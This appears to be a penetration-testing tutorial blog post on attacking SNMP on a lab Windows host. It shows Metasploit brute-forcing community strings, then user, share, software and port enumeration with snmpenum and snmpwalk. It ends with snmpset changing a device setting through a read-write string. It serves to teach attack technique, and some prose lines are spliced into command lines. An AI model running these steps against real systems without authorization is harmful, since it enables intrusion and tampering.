Metasploit has a number of auxiliary modules to help in enumerating SNMP on target host(s).
msf > search snmpWe can start with brute forcing SNMP service to identify SNMP community strings.
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/snmp/aix_version normal AIX SNMP Scanner Auxiliary Module
auxiliary/scanner/snmp/cisco_config_tftp normal Cisco IOS SNMP Configuration Grabber (TFTP)
auxiliary/scanner/snmp/cisco_upload_file normal Cisco IOS SNMP File Upload (TFTP)
auxiliary/scanner/snmp/snmp_enum normal SNMP Enumeration Module
auxiliary/scanner/snmp/snmp_enumshares normal SNMP Windows SMB Share Enumeration
auxiliary/scanner/snmp/snmp_enumusers normal SNMP Windows Username Enumeration
auxiliary/scanner/snmp/snmp_login normal SNMP Community Scanner
auxiliary/scanner/snmp/snmp_set normal SNMP Set Module
...snip...
msf auxiliary(snmp_enum) > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > show options
Module options (auxiliary/scanner/snmp/snmp_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe in each set
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
CHOST 172.72.5.1 no The local client address
PASSWORD no The password to test
PASS_FILE /opt/metasploit_open/msf3/data/wordlists/snmp_default_pass.txt no File containing communities, one per line
RHOSTS 172.72.5.141 yes The target address range or CIDR identifier
RPORT 161 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USER_AS_PASS true no Try the username as the password for all users
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(snmp_login) > run
[*] 172.72.5.141:161 - SNMP - Trying public...
[+] SNMP: 172.72.5.141 community string: 'public' info: 'Hardware: x86 Family 6 Model 15 Stepping 11 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.1 (Build 2600 Uniprocessor Free)'
[*] 172.72.5.141:161 - SNMP - Trying private...
...
[+] SNMP: 172.72.5.141 community string: 'admin' info: 'Hardware: x86 Family 6 Model 15 Stepping 11 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.1 (Build 2600 Uniprocessor Free)'
...
snip
...
...
[*] Validating scan results from 1 hosts...
[*] Host 172.72.5.141 provides READ-WRITE access with community 'admin'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
We found 2 community strings - 1 default public [ public ] and 1 private [ admin ]. 'public' is a read-only string while 'admin' has read-write privileges.
With this info, we can now go ahead and enumerate user accounts present on the target.
msf > info auxiliary/scanner/snmp/snmp_enumusers
Name: SNMP Windows Username Enumeration
Module: auxiliary/scanner/snmp/snmp_enumusers
Version: 12107
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
tebo <tebo@attackresearch.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
COMMUNITY public yes SNMP Community String
RETRIES 1 yes SNMP Retries
RHOSTS 172.72.5.141 yes The target address range or CIDR identifier
RPORT 161 yes The target port
THREADS 1 yes The number of concurrent threads
TIMEOUT 1 yes SNMP Timeout
VERSION 1 yes SNMP Version <1/2c>
Description:
This module will use LanManager OID values to enumerate local user
accounts on a Windows system via SNMP
msf > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(snmp_enumusers) > runWe can also enumerate any open shares on the target using snmp_enumshares module.
[+] 172.72.5.141 Found Users: Administrator, Guest, HelpAssistant, IUSR_PLAYGROUND1, IWAM_PLAYGROUND1, SUPPORT_388945a0, playground
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf > info auxiliary/scanner/snmp/snmp_enumshares
Name: SNMP Windows SMB Share Enumeration
Module: auxiliary/scanner/snmp/snmp_enumshares
Version: 11707
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
tebo <tebo@attackresearch.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
COMMUNITY public yes SNMP Community String
RETRIES 1 yes SNMP Retries
RHOSTS 172.72.5.141 yes The target address range or CIDR identifier
RPORT 161 yes The target port
THREADS 1 yes The number of concurrent threads
TIMEOUT 1 yes SNMP Timeout
VERSION 1 yes SNMP Version <1/2c>
Description:msf auxiliary(snmp_enumshares) > run
This module will use LanManager OID values to enumerate SMB shares
on a Windows system via SNMP
msf > use auxiliary/scanner/snmp/snmp_enumshares
[+] 172.72.5.141
Python27 - (C:\Python27)
Shared_field - (C:\Shared_field)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
To gather more information using SNMP, we can use 'snmpenum'. This handy script uses the community strings we identified earlier to collect target system information. We need to give it the target host IP, community string, and the platform.
root@bt:/pentest/enumeration/snmpenum# ./snmpenum.pl 172.72.5.141 public windows.txt
----------------------------------------
INSTALLED SOFTWARE
----------------------------------------
Adobe Flash Player 10 ActiveX
FileZilla Client 3.3.5.1
FileZilla Server (remove only)
0xb5546f7272656e74
WinRAR archiver
Java(TM) 6 Update 25
Python 2.7.1
Java(TM) SE Development Kit 6 Update 25
WebFldrs XP
...snip...
----------------------------------------
UPTIME
----------------------------------------
53 minutes, 33.31
----------------------------------------
HOSTNAME
----------------------------------------
PLAYGROUND1
----------------------------------------
USERS
----------------------------------------
Guest
playground
Administrator
HelpAssistant
IUSR_PLAYGROUND1
IWAM_PLAYGROUND1
SUPPORT_388945a0
----------------------------------------
DISKS
----------------------------------------
A:\
C:\ Label: Serial Number
D:\ Label:GRTMPVOL_EN
Virtual Memory
Physical Memory
----------------------------------------
RUNNING PROCESSES
----------------------------------------
System Idle Process
System
wuauclt.exe
ctfmon.exe
...snip...
VMUpgradeHelper.exe
VMwareUser.exe
logonui.exe
snmptrap.exe
----------------------------------------
LISTENING UDP PORTS
----------------------------------------
161
162
445
500
1032
1039
1045
3456
3527
4500
----------------------------------------
SYSTEM INFO
----------------------------------------
Hardware: x86 Family 6 Model 15 Stepping 11 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.1 (Build 2600 Uniprocessor Free)
----------------------------------------
SHARES
----------------------------------------
Python27
Shared_field
C:\Python27
C:\Shared_field
----------------------------------------
LISTENING TCP PORTS
----------------------------------------
25
80
135
443
445
1040
1042
1801
2103
2105
2107
----------------------------------------
SERVICES
----------------------------------------
Server
Themes
Event Log
IIS Admin
...snip...
Background Intelligent Transfer Service
----------------------------------------
DOMAIN
----------------------------------------
WORKGROUP
Another cool SNMP enumeration tool is 'snmpwalk'. We can use it to query the target for system information.
snmpwalk -v 2c -c public 172.72.5.141 | more
SNMPv2-MIB::sysDescr.0 = STRING: Hardware: x86 Family 6 Model 15 Stepping 11 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.1 (Build 2600 Uniprocessor Free)
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.311.1.1.3.1.1
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (96709) 0:16:07.09
SNMPv2-MIB::sysContact.0 = STRING: Target@playground.mil
SNMPv2-MIB::sysName.0 = STRING: PLAYGROUND1
SNMPv2-MIB::sysLocation.0 = STRING: Playground
SNMPv2-MIB::sysServices.0 = INTEGER: 76
IF-MIB::ifNumber.0 = INTEGER: 3
IF-MIB::ifIndex.1 = INTEGER: 1
IF-MIB::ifIndex.2 = INTEGER: 2
IF-MIB::ifIndex.65540 = INTEGER: 65540
IF-MIB::ifDescr.1 = STRING: MS TCP Loopback interface
IF-MIB::ifDescr.2 = STRING: AMD PCNET Family PCI Ethernet Adapter #2 - Packet Scheduler Miniport
IF-MIB::ifDescr.65540 = STRING: AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
IF-MIB::ifType.1 = INTEGER: softwareLoopback(24)
IF-MIB::ifType.2 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifType.65540 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifMtu.1 = INTEGER: 1520
IF-MIB::ifMtu.2 = INTEGER: 1500
IF-MIB::ifMtu.65540 = INTEGER: 1500
IF-MIB::ifSpeed.1 = Gauge32: 10000000
IF-MIB::ifSpeed.2 = Gauge32: 1000000000
...
snip
...
After this, we can use 'snmpget' to further enumerate SNMP and collect value for a specific OID.
Let's say, we want to query the value for OID 'sysLocation.0'.
snmpget -v 2c -c public 172.72.5.141 sysLocation.0
--> SNMPv2-MIB::sysLocation.0 = STRING: Playground
Cool, we see it has returned the currently configured value.
Remember, we also have a read-write privileged SNMP string - admin. Using the RW comm string, we can read and / or modify the end-target configuration easily; an attacker will use it to read / modify a router's running-config, for example.
snmpset, as the name implies, can set OID values if we have the RW snmp string.
The below command uses the RW string - admin - to change the value of OID sysLocation.0, which is a string value [ 's' option ] - Playground - to a new value NewPlayground.
snmpset -v 2c -c admin 172.72.5.141 sysLocation.0 s NewPlayground--> SNMPv2-MIB::sysLocation.0 = STRING: NewPlayground
++++++++++
No comments:
Post a Comment